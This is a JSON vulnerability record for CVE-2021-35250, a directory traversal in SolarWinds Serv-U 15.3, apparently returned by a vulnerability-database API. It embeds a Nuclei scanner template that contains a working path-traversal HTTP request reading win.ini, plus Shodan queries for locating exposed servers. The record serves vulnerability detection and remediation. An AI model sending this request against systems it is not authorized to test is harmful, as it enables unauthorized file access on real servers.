{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-35250/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-35250/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-35250/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-35250/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-35250/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-35250"},"sightings":{"href":"/api/v1/sightings/cve-2021-35250"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-35250.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2021-35250\n\ninfo:\n  name: SolarWinds Serv-U 15.3 - Directory Traversal\n  author: johnk3r,pdteam\n  severity: high\n  description: |\n    SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks.\n  remediation: Resolved in Serv-U 15.3 Hotfix 1.\n  reference:\n    - https://github.com/rissor41/SolarWinds-CVE-2021-35250\n    - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US\n    - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250\n    - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-35250\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-35250\n    cwe-id: CWE-22\n    epss-score: 0.12804\n    epss-percentile: 0.96144\n    cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: solarwinds\n    product: serv-u\n    shodan-query:\n      - product:\"Rhinosoft Serv-U httpd\"\n      - product:\"rhinosoft serv-u httpd\"\n  tags: cve2021,cve,solarwinds,traversal,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        /?Command=NOOP\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"\\\\[(font|extension|file)s\\\\]\"\n\n      - type: status\n        status:\n          - 401\n# digest: 4a0a00473045022100e86cb49c64e711100e557defec8c45587675fd770f145f0177892a3c8e4aa89102207b911d137b76cca07c8c822cc9391e53bb3e09a4473b3f617245306ea75dc807:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-35250"}